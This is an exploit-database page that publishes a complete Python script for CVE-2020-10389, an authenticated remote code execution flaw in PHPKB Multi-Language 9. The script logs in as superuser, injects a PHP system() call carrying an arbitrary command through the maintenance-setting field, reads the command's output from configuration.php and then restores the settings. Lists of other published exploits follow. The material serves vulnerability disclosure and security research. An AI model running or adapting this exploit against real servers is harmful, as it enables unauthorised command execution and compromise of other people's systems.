Menu

Search for hundreds of thousands of exploits

"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"

Author

Exploit author

"Antonio Cannito"

Platform

Exploit platform

php

Release date

Exploit published date

2020-03-16

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-03-15
# Exploit Author: Antonio Cannito
# Vendor Homepage: https://www.knowledgebase-script.com/
# Software Link: https://www.knowledgebase-script.com/pricing.php
# Version: Multi-Language v9
# Tested on: Windows 8.1 / PHP 7.4.3
# CVE : CVE-2020-10389



#!/usr/bin/env python3
import argparse
import requests


#Parsing arguments
parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10389 - Authenticated Remote Code Execution in Chadha PHPKB Standard Multi-Language 9 in admin/save-settings.php")
parser.add_argument("url", type=str, help="PHPKB's base path")
parser.add_argument("username", type=str, help="Superuser username")
parser.add_argument("password", type=str, help="Superuser password")
parser.add_argument("cmd", type=str, help="The command you want executed")
args = parser.parse_args()

session = requests.Session()
#Perform login
session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text
#Sending exploit code and downloading the file
exp = """' . system("{}") . '""".format(args.cmd)
data = {"putdown_for_maintenance": "no{}".format(exp), "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "[email protected]", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", "article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": "yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''}
url = args.url + "/admin/manage-settings.php"
session.post(url, data=data)
print(session.get(args.url + "admin/include/configuration.php").text.encode('utf-8'))
#Resetting settings
data = {"putdown_for_maintenance": "no{}", "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "[email protected]", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", "article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": "yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''}
session.post(url, data=data)
Release DateTitleTypePlatformAuthor
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-20"VMware Fusion 11.5.2 - Privilege Escalation"localmacos"Rich Mirch"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-03-18"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path"localwindows"El Masas"
2020-03-18"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure"remotemultiple"Maurizio S"
2020-03-18"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"remotehardwareFarazPajohan
2020-03-18"Netlink GPON Router 1.0.11 - Remote Code Execution"webappshardwareshellord
2020-03-17"VMWare Fusion - Local Privilege Escalation"localmacosGrimm
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-17"Microsoft VSCode Python Extension - Code Execution"localmultipleDoyensec
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection"webappsphp"AYADI Mohamed"
2020-03-16"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)"webappsasp"Miguel Mendez Z"
2020-03-14"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)"doswindowseerykitty
2020-03-13"AnyBurn 4.8 - Buffer Overflow (SEH)"localwindows"Richard Davy"
2020-03-13"Drobo 5N2 4.1.1 - Remote Command Injection"remotehardware"Ian Sindermann"
2020-03-13"Centos WebPanel 7 - 'term' SQL Injection"webappslinux"Berke YILMAZ"
2020-03-12"rConfig 3.9 - 'searchColumn' SQL Injection"webappsphpvikingfr
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
2020-03-12"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure"webappsjava"RedTeam Pentesting GmbH"
2020-03-12"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Akıcı"
Release DateTitleTypePlatformAuthor
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection"webappsphp"AYADI Mohamed"
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
2020-03-12"Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection"webappsphp"Daniel Monzón"
2020-03-12"rConfig 3.9 - 'searchColumn' SQL Injection"webappsphpvikingfr
2020-03-12"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-12"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Akıcı"
2020-03-11"Wordpress Plugin Search Meter 2.13.2 - CSV injection"webappsphp"Daniel Monzón"
2020-03-11"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading"webappsphp"Andrea Cardaci"
2020-03-11"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion"webappsphp"Andrea Cardaci"
2020-03-10"PHPStudy - Backdoor Remote Code execution (Metasploit)"remotephpMetasploit
2020-03-10"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting"webappsphpEn_dust
2020-03-10"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution"webappsphp"Andrea Cardaci"
2020-03-10"Persian VIP Download Script 1.0 - 'active' SQL Injection"webappsphpS3FFR
2020-03-09"60CycleCMS - 'news.php' SQL Injection"webappsphpUnkn0wn
2020-03-09"PHP-FPM - Underflow Remote Code Execution (Metasploit)"remotephpMetasploit
2020-03-09"Sentrifugo HRMS 3.2 - 'id' SQL Injection"webappsphpminhnb
2020-03-04"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read"webappsphpNgoAnhDuc
2020-03-03"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection"webappsphpemaragkos
2020-03-03"Alfresco 5.2.4 - Persistent Cross-Site Scripting"webappsphp"Alexandre ZANNI"
2020-03-02"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)"webappsphp"Jinson Varghese Behanan"
2020-03-02"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)"webappsphp"Lucas Amorim"
2020-02-27"Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Meisam Monsef"
2020-02-26"PhpIX 2012 Professional - 'id' SQL Injection"webappsphpindoushka
2020-02-25"WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass"webappsphpGeekHack
Release DateTitleTypePlatformAuthor
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48219/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse